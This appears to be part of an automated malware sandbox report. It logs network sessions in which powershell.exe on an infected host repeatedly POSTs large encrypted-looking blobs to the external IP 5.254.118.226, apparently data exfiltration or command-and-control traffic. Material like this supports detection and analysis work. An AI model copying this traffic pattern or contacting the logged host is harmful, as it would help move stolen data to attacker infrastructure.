Aug 28, 2021 00:07:11.353526115 CEST	7610	OUT	Data Raw: fd e2 d6 a7 ac 53 a5 63 86 ba 66 a1 73 30 70 42 1f 15 fc 7f 12 14 31 27 5e e4 58 e7 a2 0e 9f f6 eb 70 ca 04 2c f7 6c 32 b6 bb bc bd e7 d1 14 b4 1d a7 92 69 be bc 42 ea b2 af 49 c6 fa bc c0 79 1c 6e b4 04 65 6d 16 27 a8 ca c8 55 56 73 3e 8c d1 a3 Data Ascii: Scfs0pB1'^Xp,l2iBIynem'UVs>{690.Q{7DzPk@rW6xZoSiuE;BK6FE;_%x{`2[%`f'9B-HoztM\OE=fTEM]IpI
Aug 28, 2021 00:07:11.417231083 CEST	7616	OUT	Data Raw: e2 51 b7 f9 3c 8f cf fd 76 e2 7d e0 19 f8 ce d2 67 89 62 cc 00 c5 55 a3 9f 8d 99 b8 cc 41 a1 fe 73 7f 4e 3e 1c 51 76 06 76 d1 92 4c 05 d9 04 4f ad 20 14 94 80 91 67 41 9d fd 28 b1 8a a0 d5 88 a4 52 2f 19 a3 63 73 56 50 ef 15 58 0b 45 45 e9 cc 36 Data Ascii: Q<v}gbUAsN>QvvLO gA(R/csVPXEE6Cr%QQ\|I#9(1Q1v7R6dw>E9W6n-%pn8$g&r]$x@{gg(5mtL5+-u7k39%szZ

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.3	49753	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:07:11.505836964 CEST	7621	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 181076
Aug 28, 2021 00:07:11.505893946 CEST	7632	OUT	Data Raw: 5e 72 ee 51 e3 80 63 d4 85 9c 7a 8f ce e1 7f 86 8a e5 95 3b a8 e7 73 f7 0f 20 b5 da 31 1c c2 aa 75 ab e6 ce 43 1e 7b 70 e2 67 b1 16 14 ca 49 7b bf 09 1f e1 78 f7 54 76 fe f6 42 c4 ca 87 a3 69 d8 cf 1b 23 f9 af 44 6c 6a 25 58 41 36 5e e3 44 d6 3b Data Ascii: ^rQcz;s 1uC{pgI{xTvBi#Dlj%XA6^D;(2\|XqL[H<D&wS@l\|l}"bKiE1/:HD\0!Rrj=a"Xi6U:s@.Rmk`?xx@_Y'
Aug 28, 2021 00:07:11.599436998 CEST	7637	OUT	Data Raw: d9 45 b1 67 d0 17 30 b6 cc 9a d3 1e c6 9f 32 f2 17 56 00 94 50 37 9a 5f 14 db 56 ae 4f 4a d7 67 88 a6 09 6d 1a 15 1f 4e 84 b0 e8 97 97 72 af 3a d3 4c 8e 6c 73 bd f9 e1 d5 6d 33 50 ce 7e d0 b2 a6 49 c4 e6 31 42 2c 69 d9 94 f5 39 51 bc 3f cc 93 f4 Data Ascii: Eg02VP7_VOJgmNr:Llsm3P~I1B,i9Q?kN]yfOrd_j5QJZIZ/HXqn]S`/t b)V}2%+9mid0Bn>FT=GmgQHN\)EI>},SM
Aug 28, 2021 00:07:11.599509954 CEST	7659	OUT	Data Raw: 07 40 d5 ae 78 45 b0 e4 e9 88 38 d9 70 61 4f 6a 3d f1 6b 14 38 f0 a4 6d 93 86 cb 63 e2 c3 7a 46 cb 77 95 2b 5f 39 76 09 b9 35 74 4e e1 1e a8 4d 50 c2 f2 70 9c d1 48 21 be 59 17 95 83 28 9b 83 55 e2 b8 6d 50 39 99 26 fe 34 23 ea cb a6 16 a9 16 13 Data Ascii: @xE8paOj=k8mczFw+_9v5tNMPpH!Y(UmP9&4#Ri`MFb?Y %y9?\%I}fO#&9~cK{T0_$rav-jJyU]U(v'pj;U)#kKMWfCXEQ
Aug 28, 2021 00:07:11.666742086 CEST	7666	OUT	Data Raw: 1e 0d dc 54 c1 08 a0 34 37 12 ee 06 b5 a2 e8 74 10 ca 1c 69 00 9d a8 19 1d 59 bb 5d 47 50 a1 f0 ae 58 84 a5 22 56 b5 99 d5 49 b9 e7 41 ca c6 6e 0b fb eb 39 85 ce 46 cc d4 0b f8 fd c2 32 de 39 a8 de dc fc 40 87 24 b7 f3 b1 a3 b8 96 9c 35 4a c7 c1 Data Ascii: T47tiY]GPX"VIAn9F29@$5J`>W)b9<Oy`MeQhm.B<J=y5DpuH7"072^7cD{@qehotp`TX~4#\|5l%Tk
Aug 28, 2021 00:07:11.667171955 CEST	7669	OUT	Data Raw: 43 44 f3 2c 0d f7 aa e7 4f 1b ed 10 b1 c0 99 a3 db a0 b6 9b 89 58 a4 c2 7e c1 ce 2f e0 1c 65 46 46 a4 d5 60 a1 43 5e ee 2c 2d fb d4 2f 61 69 23 38 24 74 fc 42 18 8e 85 0a 93 1d 3a cb 4e 7d 1c f8 14 52 b8 0c 1b 72 72 7e 27 5b d2 1b 65 0c a3 24 38 Data Ascii: CD,OX~/eFF`C^,-/ai#8$tB:N}Rrr~'[e$80">'Z9~;91b w0sji![ADyRDR3%Xij8&KSo_ sKc\I$~+{Em-,e2q:(/&=6
Aug 28, 2021 00:07:11.667253971 CEST	7674	OUT	Data Raw: 77 b0 36 2c 27 cd 6d c5 e9 93 e7 6f b3 a6 d1 6b 9b 9a da 19 3e 8a 53 5b af 4d 11 a6 94 24 bc 8d 95 3c 25 dd 9b 6f ef c4 4e 75 e2 20 8f 21 0f fe 50 51 4a 89 f2 b1 00 48 17 49 02 e1 7e 8b 17 d1 c9 35 69 93 c6 c6 34 13 85 b1 9c 2b 0c ff 42 17 ce 0a Data Ascii: w6,'mok>S[M$<%oNu !PQJHI~5i4+BG[Rdpx.7H"6NX,QK/-8LYy2:$Yst!r}{WljzN7>q)A`JV*~:0jDAK4KD#=aAz8p/
Aug 28, 2021 00:07:11.667298079 CEST	7677	OUT	Data Raw: fa dd 9f 38 7a 60 f8 93 88 fc 20 f3 d9 fb 59 e1 1f eb e6 25 32 88 1c 2b b3 1c 72 57 a0 24 85 d9 48 9a 82 c6 89 b4 80 ce 18 ba 19 4e 4e 56 e2 02 96 cc b5 8b 6a ee 1c cc 6a 73 3d 86 b1 e1 9a 6a 2e ae d1 39 1d 1f 69 e0 ba 4b 4d f1 82 c3 01 5c 30 43 Data Ascii: 8z` Y%2+rW$HNNVjjs=j.9iKM\0C!k=es\|8h6{?jL`OL1V;`GWN%hk_)[N%idvnx)gqafz\/k"'9l#[4;v{RJ5x+Md]c
Aug 28, 2021 00:07:11.667954922 CEST	7682	OUT	Data Raw: 36 f1 09 32 44 2a f0 85 a0 d6 94 31 c2 ce b8 b8 ce 49 88 e2 21 d8 73 65 08 2f 60 23 73 a6 19 9b 0d 4b 49 ca 1f 66 be a1 a1 0f 45 93 ab 18 ea 2a 1f b9 b0 90 52 37 3f fe 7e 9e 28 19 5b 60 b1 ff 6e 0a 08 f6 0f ee 7a 7e 82 d7 77 c3 01 20 57 e1 72 90 Data Ascii: 62D1I!se/`#sKIfER7?~([`nz~w WrN2CDk#z8G]8q]NA13~MW64jfahpRe(l43<g})#Wr>)=0G3#v+xif:
Aug 28, 2021 00:07:11.668075085 CEST	7707	OUT	Data Raw: 49 b0 6f e2 71 b7 e6 4d 14 e4 ac ae 91 a5 85 23 60 57 4f 34 53 50 f9 54 8e 3f bc c5 33 ea d1 62 cc 5a da d6 c4 81 12 32 07 2e 2e 9a e0 3f a1 68 85 9a ca bc 0c 95 19 09 1c 9d 15 eb d5 b0 57 b0 37 05 cc 69 d1 7b 06 42 17 84 fb 38 c9 48 38 57 38 27 Data Ascii: IoqM#`WO4SPT?3bZ2..?hW7i{B8H8W8'C8bWAz"{T-t}lH05BKM.;mV)3$zaYQUbEZg>6zk<~D&DSb)j6Z4J`vjJ!%w
Aug 28, 2021 00:07:12.011003971 CEST	7715	OUT	Data Raw: 1e 0d dc 54 c1 08 a0 34 37 12 ee 06 b5 a2 e8 74 10 ca 1c 69 00 9d a8 19 1d 59 bb 5d 47 50 a1 f0 ae 58 84 a5 22 56 b5 99 d5 49 b9 e7 41 ca c6 6e 0b fb eb 39 85 ce 46 cc d4 0b f8 fd c2 32 de 39 a8 de dc fc 40 87 24 b7 f3 b1 a3 b8 96 9c 35 4a c7 c1 Data Ascii: T47tiY]GPX"VIAn9F29@$5J`>W)b9<Oy`MeQhm.B<J=y5DpuH7"072^7cD{@qehotp`TX~4#\|5l%Tk
Aug 28, 2021 00:07:12.821890116 CEST	8044	IN	HTTP/1.1 500 Internal Server Error Content-Type: text/html Content-Length: 193 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>500 Internal Server Error</title></head><body bgcolor="white"><center><h1>500 Internal Server Error</h1></center><hr><center>nginx/1.14.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.3	49754	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:07:12.075746059 CEST	7717	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 181056
Aug 28, 2021 00:07:12.075830936 CEST	7729	OUT	Data Raw: f5 76 4e 46 02 7a 5c 57 a8 71 ba e7 83 77 78 7e e5 8b 63 08 76 96 5f 9d d0 12 d7 81 af 7e 04 18 f2 7f f3 98 2c 1a ab 2b 78 1b 1b d2 17 70 57 f1 25 30 9f f2 3a b3 7c 5f 17 af 74 ef a2 d9 a6 2b 6d a2 f4 05 83 df 53 cc de 39 8f 5b 7c 8b 87 60 ba e4 Data Ascii: vNFz\Wqwx~cv_~,+xpW%0:\|_t+mS9[\|`]?{tes{RoE$!)6}&L]^)#'hvS NQQ2:Ve/GeAa=he!2`\>ab)3D~Ul_lGR3V[uF7aw
Aug 28, 2021 00:07:12.168171883 CEST	7734	OUT	Data Raw: 2e 9d 11 dc 8e a8 18 75 be 5f 16 b4 1a c2 c6 be 40 e3 62 bb 79 59 f3 0e fb 54 31 90 13 da 7f c7 d3 eb b1 8d cb de 49 9e 18 79 21 b9 40 4a f5 44 a1 96 b8 24 ca 6a 22 c2 35 e3 33 25 e5 f9 87 71 cf a5 6a ca 83 3c c3 c9 f5 60 27 dd c6 ad ea 01 36 54 Data Ascii: .u_@byYT1Iy!@JD$j"53%qj<`'6T\!t!qExr4XZ+R(O%%c\4[%(tvsvNpw74wC59"h2Sf&#Fp9lJ \.FWC

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.3	49755	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:07:12.333542109 CEST	7740	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 180855
Aug 28, 2021 00:07:12.333663940 CEST	7752	OUT	Data Raw: 51 36 aa 26 7b 7e c7 45 d8 9f e8 c4 94 76 99 95 e5 50 31 40 cb d6 b4 1f 9c 03 be 8f 08 c9 dc 9f 38 ca c9 ae 8b e8 9f 18 eb 25 65 a2 3f 7e 41 5f 30 3b 4d a3 28 c2 c1 79 80 8b 88 78 be 39 3e 10 c1 49 8d c8 ab ea 0b fb af 19 53 a7 72 13 de 1e c0 5f Data Ascii: Q6&{~EvP1@8%e?~A_0;M(yx9>ISr_`\|:wtP/a'XVxE1Ppmj_q\3-I-FhIRouW&W&jNY:=nfBhKZUVux4^F]CmP^]+afN<s+
Aug 28, 2021 00:07:12.403942108 CEST	7762	OUT	Data Raw: 66 b4 83 02 84 1a 6e 97 8f 8b 88 8f 5a 57 68 9b 41 65 95 81 8d 0a db 07 f3 89 fe 3a f5 be c2 83 49 6f 5d 2a ad fe 90 f6 18 dc 70 48 bd b1 7b a4 f7 0a be 91 0a ad c3 07 9e 02 a4 4c 39 61 39 5e 6c 3c 64 96 6f fa 08 71 cb bc 63 6d 06 c4 bd f1 61 36 Data Ascii: fnZWhAe:Io]*pH{L9a9^l<doqcma6.yuL.FY5<,b1-oLh,5Hp(O:RjSk5eMgc>L};.mtJ5}HGE{eu_E5VIii+G[\|fRO"{QLha
Aug 28, 2021 00:07:12.404022932 CEST	7785	OUT	Data Raw: d8 c6 6d 9f 83 f3 46 72 e7 1a b3 3f 5b f0 d2 94 0d ad 4e 12 c9 9e 1a 12 c4 72 64 df 10 84 44 c8 a3 7f 4b d6 8f 07 37 5c 95 05 e0 d3 e9 48 17 2c cb d0 b4 92 ab 00 b0 28 04 fe 5a cc 16 29 8a ee de 7d 8f 9b 88 0d 93 53 17 fb 55 df 1f 4b 98 16 b0 65 Data Ascii: mFr?[NrdDK7\H,(Z)}SUKe^u~h;%y'K'enxKWg;O#FG9(a{5SXfsq$.;nmeGTnHW7jX@RbCf)5a
Aug 28, 2021 00:07:12.473040104 CEST	7805	OUT	Data Raw: da 01 c0 98 19 4b 58 be 51 bd a6 63 37 27 65 ed b7 ff 57 af b5 64 50 e5 9d eb e0 ef 63 0d 41 a4 d7 98 e8 6f db e4 ce 7e 45 19 4d 45 2f 84 9f 26 80 26 5d 9a 21 cf 09 9f b2 4e f1 fe 7a 3c 67 3d 89 47 36 fe 96 35 1e dd 9b 19 78 d4 e7 a4 b4 58 17 ed Data Ascii: KXQc7'eWdPcAo~EME/&&]!Nz<g=G65xXP@Eq].vFv/~_acZT,iJIjP+G&}._-<NMiRRxjugVAzc:3m0fP~e\,42SZi/W:
Aug 28, 2021 00:07:12.473149061 CEST	7826	OUT	Data Raw: 61 76 f2 0b 0e 0a 23 9b f0 60 88 33 f3 ab 66 f1 75 4b 06 b9 26 f5 b9 f7 3b 20 3d 96 67 4b a3 23 92 e9 33 fc 07 7c 4e 38 27 f3 69 92 8c 19 c9 86 e8 b9 81 bb d8 49 dc 86 73 80 f1 65 24 8b eb 61 68 56 45 31 ac dc 9a 37 be 65 32 cd 37 03 77 2c f3 f0 Data Ascii: av#`3fuK&; =gK#3\|N8'iIse$ahVE17e27w,,+FeI:b/p\ZOxNKg"TA_5*:,<Yr.&$?]h.Cz%:%o\|9QFOD;qJV#;0[}r'C
Aug 28, 2021 00:07:12.473176956 CEST	7832	OUT	Data Raw: b0 c5 97 70 f2 f8 af f0 b3 7f 6f f5 70 cb 2e 38 d7 22 88 90 15 e4 07 6b 17 7b e2 29 b6 bb 02 85 1c ea 4c 9d 4c c7 1e a0 53 fd 10 2a cf 2c 8e e9 1c 83 eb e3 42 64 5e df 27 8e 59 9b b7 de a5 9e c1 9f 83 7d 39 f0 bb e5 e3 c3 d6 22 a9 38 ce 84 8b fc Data Ascii: pop.8"k{)LLS,Bd^'Y}9"8*qU84,'8rw3AJ 1Ed){V-K[alL#/mb:vMh!rmTch! g_M5"q}+K
Aug 28, 2021 00:07:12.473184109 CEST	7834	OUT	Data Raw: 9c ae c8 71 aa cf 9b 28 24 d2 12 5b 05 f7 dc b1 87 a8 68 6f da be 3b 1c 2f 7e 94 53 48 72 8b 6e 79 ba ac ff 9d 25 a2 35 8f c9 3b f0 ad 7d 7b 6b 3a 5f 3c 28 e7 7c 62 f0 a1 de 04 63 dc da 05 8f 9a b5 89 2b 00 f0 14 dc 3d ec 62 f0 1d a6 fe b2 52 63 Data Ascii: q($[ho;/~SHrny%5;}{k:_<(\|bc+=bRcPn*eonD}"y>4[A}L$SI5v>sV`=/"Gg-L\%Wdo%kk}i\2wAp;=lc1K>FL c
Aug 28, 2021 00:07:12.550730944 CEST	7891	OUT	Data Raw: c8 53 b3 89 cb fa 29 09 87 be b9 10 98 ca b2 da 7f aa 18 27 59 c7 ce b4 c5 7f 41 a3 73 08 c6 07 25 00 96 6c 4f ec 80 95 a8 cb d1 09 e0 8c 9b bb 57 13 d8 0c 28 e0 3f d4 76 8c ed fe c5 81 a4 f9 cd 90 31 88 a1 7d 0c 8e 02 a8 8a 5d 6c 80 31 ef 42 b9 Data Ascii: S)'YAs%lOW(?v1}]l1BxSJTBHJt3t5"iOzd!t zAqs3l\|hESFB2"i:.4N>_jMl@(trT'Ms(\|!qWdpUWR
Aug 28, 2021 00:07:12.554662943 CEST	7961	OUT	Data Raw: ab 46 87 a6 d6 2d 43 78 b1 ba e1 3c a7 f1 c7 5b 9c f5 e2 30 5c c6 21 c1 44 75 c4 0c d1 ba b1 ea b8 12 61 f5 79 82 2d 6e c7 95 35 90 42 d7 fd b0 3b ac f7 7b 14 60 e6 e3 23 f8 02 ab 15 d7 34 f1 79 f0 06 4c 8a b6 5a 16 ee 65 60 4c 67 10 46 2c 50 c5 Data Ascii: F-Cx<[0\!Duay-n5B;{`#4yLZe`LgF,P p,-3D44HreUTs\H?9<b}amDZQv$>~7zX^)i w4J4$0o86QiwHWpszEBt +byF
Aug 28, 2021 00:07:12.554727077 CEST	7971	OUT	Data Raw: a1 78 28 57 ac 30 b8 ac 97 c8 42 6c 23 30 5c 85 cf f1 87 2e fb 8c a9 a7 7c 4c a5 0c 06 c5 cf 88 8b eb 80 c1 59 c6 1f ea d5 de 62 f4 74 4b d7 e1 eb 65 c5 01 a9 60 48 00 12 e3 a2 a9 56 c6 6d cd 01 db d2 10 3e 68 fa 40 2d e3 d9 d7 77 3d 06 19 d5 05 Data Ascii: x(W0Bl#0\.\|LYbtKe`HVm>h@-w=LZ $ YL=0<tP'NZ2vw=_adN5HsLKP PManf"`)h0qz%M{2A"

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.3	49756	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:07:12.711265087 CEST	7997	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 180809 Connection: Keep-Alive
Aug 28, 2021 00:07:12.711333990 CEST	8008	OUT	Data Raw: 59 54 b4 74 31 83 e8 a9 21 e5 ad 90 ac f2 cb 38 66 76 64 14 cc 38 b6 de ce 6c 19 24 0a 3b a4 6c 9e bb 0b 50 1c 22 8c f9 1c b2 d3 59 7c 15 22 02 bf cb 50 2c 8d d8 aa 22 9d d5 a5 c4 6a c5 9f e5 42 42 f1 ef e8 7b 1d 45 e9 6a f6 1a 63 5d 62 ba 4a 18 Data Ascii: YTt1!8fvd8l$;lP"Y\|"P,"jBB{Ejc]bJd=xE\|V;"1DB$@tzSbbc-#uF' 6+rL=NQ{C J@IMRaTBI]V7WOpx@.C&J3n}:eazz

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.2.3	49757	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:07:12.849937916 CEST	8045	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 180635 Connection: Keep-Alive
Aug 28, 2021 00:07:12.850061893 CEST	8057	OUT	Data Raw: b8 e2 cc 1d 69 b0 a6 1c 20 c6 c1 7f 08 a5 d9 7d d1 48 fb ce 64 0d f7 b0 7f a5 76 16 97 48 c7 1f 28 f7 27 1d 33 47 9b 39 48 5f c8 af a8 0d 57 c7 62 2e db a4 48 15 bb ac e9 1d 9d c2 3a 90 83 d6 00 14 61 7a 7a 5c 2b 2e 94 8b b6 9f 76 a7 9a 28 ce f7 Data Ascii: i }HdvH('3G9H_Wb.H:azz\+.v(#0E g8b1Nu:Lb$7bP]'./tI7+qMtx U(j"\lG-+YXU(TuFZO\|G&w
Aug 28, 2021 00:07:12.923095942 CEST	8072	OUT	Data Raw: ad 1e 18 71 34 3e 59 1a d0 7e 83 40 2d 90 30 47 9a 25 31 71 7c f5 07 dd 52 ba 74 9e 4d bd eb 92 90 83 68 01 26 47 92 e2 3c 29 51 e3 81 ac 3e db d2 ed ec 7e 90 5d a5 5c 22 69 78 2f 0e b3 41 62 2c 52 06 7a 4c 72 7c c7 5c 43 1c ee 8c 31 3e 04 7d bc Data Ascii: q4>Y~@-0G%1q\|RtMh&G<)Q>~]\"ix/Ab,RzLr\|\C1>}o_jV:%`[lS}pq:Z(FB,~f'ET,&u!9(XCPpNRG+2]<6A]#CfU` (-T{n
Aug 28, 2021 00:07:12.924029112 CEST	8095	OUT	Data Raw: 9e 80 d1 28 59 c9 7b ae 7f f4 c0 c2 65 dc 97 33 16 c4 d7 ec 91 03 d4 03 59 7f ab d3 9f 64 3d 3b 21 d2 ef bc b6 4c 8e 34 eb 90 e2 d2 ca c4 e9 f2 c6 bb 61 6c 06 f9 aa 56 69 d0 2e 9d d4 04 3c 14 6e f5 11 4e be ac c9 b5 de 41 6b f3 15 b9 ac 38 d5 52 Data Ascii: (Y{e3Yd=;!L4alVi.<nNAk8Rz HKs 5Atscgw@J6(4*^xk4C"Gi]w[HlzE&w"FXKd5d$?QF0Q<@pzk
Aug 28, 2021 00:07:13.097832918 CEST	8101	OUT	Data Raw: 04 3a a0 7f 18 5a 3c 26 69 7f 81 54 9e a4 75 23 31 b2 d6 bc 91 c5 a8 32 18 20 b0 d2 51 57 23 1b ae 8b 81 a7 4a f3 ee 8a ff 54 53 d6 7b 1c 40 68 32 e9 ce ba 72 9b ca e3 c2 01 d9 39 27 6f e2 60 9a de 68 e2 ca 3e 5d 28 46 a1 f8 01 44 c5 6c a5 98 c7 Data Ascii: :Z<&iTu#12 QW#JTS{@h2r9'o`h>](FDl@%_0m`8J.zDM)TU;1?=q,hd\|S5/}hx`B5xo^}>m.<+e^EaOeS}=8-aG5P)"-fq#NJ
Aug 28, 2021 00:07:13.571095943 CEST	8139	OUT	Data Raw: c4 49 0e e6 cf 95 4b e4 37 63 0d 9d 21 93 e2 ad 46 f9 40 60 23 a4 db 85 57 6a bb 2f c0 ca f1 38 37 9b 74 d4 6a 9f 81 a7 fd d8 b7 70 24 25 d9 62 82 a2 43 64 f2 95 6c a7 8f d9 1d 5d 90 44 db 40 6d 01 53 e0 43 4f 5f fc 1f a8 e4 18 fb 0e 96 ad a5 0b Data Ascii: IK7c!F@`#Wj/87tjp$%bCdl]D@mSCO_3Lmb^'&H`{5S0(pj"W(\|C:{H(@XDyA(0N`~0r_Y$\|lim6-th]}${A
Aug 28, 2021 00:07:14.258650064 CEST	8176	OUT	Data Raw: c4 49 0e e6 cf 95 4b e4 37 63 0d 9d 21 93 e2 ad 46 f9 40 60 23 a4 db 85 57 6a bb 2f c0 ca f1 38 37 9b 74 d4 6a 9f 81 a7 fd d8 b7 70 24 25 d9 62 82 a2 43 64 f2 95 6c a7 8f d9 1d 5d 90 44 db 40 6d 01 53 e0 43 4f 5f fc 1f a8 e4 18 fb 0e 96 ad a5 0b Data Ascii: IK7c!F@`#Wj/87tjp$%bCdl]D@mSCO_3Lmb^'&H`{5S0(pj"W(\|C:{H(@XDyA(0N`~0r_Y$\|lim6-th]}${A

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.2.3	49758	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:07:12.892453909 CEST	8058	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 180652
Aug 28, 2021 00:07:12.892580032 CEST	8070	OUT	Data Raw: 38 0b 9e e0 9c 4d b9 cb 16 aa ab 1f f5 d7 94 d2 57 86 cb eb ad d1 0b 33 16 33 f6 c9 a3 44 e5 9e 4e 08 25 37 8b 28 ba 89 10 b0 fd f0 2b b2 10 46 77 86 97 14 a6 4a 7b 65 fe 6c cb 6a 56 ee 28 d1 c4 0e cf ed b2 5d 48 2f cb 43 db fb d3 1a 08 62 23 00 Data Ascii: 8MW33DN%7(+FwJ{eljV(]H/Cb#x{svTfu,M/]X[G+(XZG&il\x7bGj7~P6}yL:`!\= Tzf);}zsM10M+7kx{h^bD]DF
Aug 28, 2021 00:07:13.258721113 CEST	8117	OUT	Data Raw: c7 b4 cd 0d 1b 60 82 bf 0a 60 f9 66 be 48 9c e8 3a f1 76 2f 5d 51 fa e0 22 10 fc 19 cc 8f d0 3f 4e c0 c7 a4 9d b6 38 ca 33 af ee 6e c3 02 e5 76 3c 07 38 04 dd ed 99 f3 60 51 81 e2 b8 b0 ae 5f e9 cc 1f cb 46 f4 98 a6 da b7 8f d0 dc a6 01 a9 84 da Data Ascii: ``fH:v/]Q"?N83nv<8`Q_Fk\|[~{is7.99Hru2wO1,Fd\|'l\O'9WFVpyPW<w=SZgEqw(-q.lq9}9'Q%e
Aug 28, 2021 00:07:13.571199894 CEST	8140	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 180652 Data Raw: 38 0b 9e e0 9c 4d b9 cb 16 aa ab 1f f5 d7 94 d2 57 86 cb eb ad d1 0b 33 16 33 f6 c9 a3 44 e5 9e 4e 08 25 37 8b 28 ba 89 10 b0 fd f0 2b b2 10 46 77 86 97 14 a6 4a 7b 65 fe 6c cb 6a 56 ee 28 d1 c4 0e cf ed b2 5d 48 2f cb 43 db fb d3 1a 08 62 23 00 c3 99 be be b8 78 a9 ac 00 7b 0c f6 73 8b 95 76 54 66 03 75 a1 19 d1 2c f2 4d e6 d1 fe 2f 09 f5 15 e2 c3 b2 c8 e9 5d 58 5b 9b 47 2b 28 06 58 d8 5a 47 26 09 69 89 09 bc 13 1d 6c 5c 08 84 78 37 62 cf a6 47 03 d6 a5 6a e5 37 7e 16 50 36 b5 7d dc 79 09 e5 b1 4c 3a 8c b4 60 e8 97 f7 21 5c 16 3d d6 8c 20 54 c3 7a e9 66 29 3b 7d a2 d3 f0 7a 93 b1 fc fe 73 0d 4d be 19 31 00 04 30 d5 a9 4d 2b d0 80 98 14 b0 18 fa 37 ef ff 6b 78 8c 7b d7 c2 68 ba b2 89 97 5e 7f 62 44 b2 07 5d 82 44 46 ff 97 fc bf e3 26 d3 bb f7 8d cf 83 90 c3 60 87 ce 29 8e ea a3 2a a9 f8 8e 74 30 64 92 52 71 a1 f3 ff f5 1b 3f c2 50 83 61 26 67 da d7 b5 06 b2 59 20 3b 53 15 c5 40 1d 67 18 3f 8d 09 04 ce de 4f 4c 08 cb df 26 c8 89 db 09 1f 28 db 0c f1 a7 60 a0 c0 62 2a 98 8e f0 0a 82 00 0f a3 9f a5 e8 be fd 47 53 8b 8a 10 cd eb d4 0d c5 e4 9a 31 7e e6 c9 ad f8 e3 dd 34 b4 d8 e6 89 52 a2 82 38 da 52 9c 62 ef e3 f3 a9 f1 3b 42 41 79 82 0e 8c 22 0a 46 0b 8f 64 6a 0c f4 50 29 db 00 4a 74 0d bb 8e 8a fd f9 59 db 21 7f 9a 17 0f 50 e7 85 5c af 6e f9 97 9d 03 4f 1a 80 c3 92 d7 de 98 9b a4 c9 0c e9 f8 94 f1 9d ac 59 83 78 9a b6 68 d3 47 53 44 7b d6 0a 83 5b 55 49 07 6c 69 76 49 32 22 4a 5a a5 d1 ed 53 34 dc 0a 40 8f e1 51 f1 24 56 2e 19 66 b3 86 b2 4b ee b3 3e 10 67 c4 f9 23 a5 28 7c da f7 ad f6 91 72 71 67 f3 a9 f8 d0 12 15 89 e2 f0 04 3b e5 ea f1 29 b0 80 6d d0 b8 78 15 1c f4 23 d2 bb d0 7d 68 03 21 15 4f eb 42 24 85 9d 75 8b 25 25 2e ef 2b b9 7c f2 13 ae 44 c5 73 5b da 8c bf a8 a8 bc 8d 06 7e 50 13 c7 cc c7 7d c5 87 4a e2 ef 5e 7b 8e df 87 6c ce 0e 86 7e f9 17 e0 d9 6d 32 9c 19 47 3e e9 b6 5e cd 73 b3 7d 30 a6 64 1f 51 01 ec 60 26 74 2f 91 88 44 ae b2 a3 07 10 31 93 ca 27 ad e9 3e 45 1f 8b 87 ab 8f 20 dc 27 0d af ec c9 52 2c 70 46 2f 09 a5 ee 73 50 66 8f d6 e0 9a cb 71 7d 62 7b 24 d2 54 b1 c4 32 bb c3 eb f6 4b 56 53 14 6a 41 27 aa c1 0e d1 08 f7 7e 8d 35 dd b8 e0 fd 9d d6 e2 b6 8b a4 a3 66 7f bc e6 02 c3 6b 11 1b ee 81 7a a2 a7 b0 9c 16 c5 9a d7 62 fa 53 36 d7 98 af e9 22 fb 0e bb a9 5a 9f 2b d8 25 18 42 36 19 fc 8b 32 6d 54 6c 17 c4 74 f4 55 f7 20 05 a1 73 af 1c 98 3d ec 19 bd 60 27 2a 18 f5 39 42 2b a5 c0 be 60 8d 91 37 27 c3 a3 f7 8d ff bb 9a 01 45 61 0a 88 50 c2 50 35 dd 7c 3c 25 20 78 4b ab a7 26 50 2e 8d 41 65 fc fd 8c 53 d1 9e a3 08 bc cb 5c 02 da 19 d8 06 f4 76 f6 24 49 9b 05 e5 de e0 63 32 3e 40 cf 74 02 ea b9 b0 6e 35 52 2c 22 0d 66 75 0e d2 59 5c a6 5b 06 e7 20 52 b7 a2 ce ce 33 17 ed 73 43 a3 4f 63 53 d2 6b af 49 6b 9f ee 7a d7 79 0a f3 7d 77 00 9f 49 41 67 df 6a c5 f4 e1 8b 97 d5 18 8f ca 5d bc 4d d5 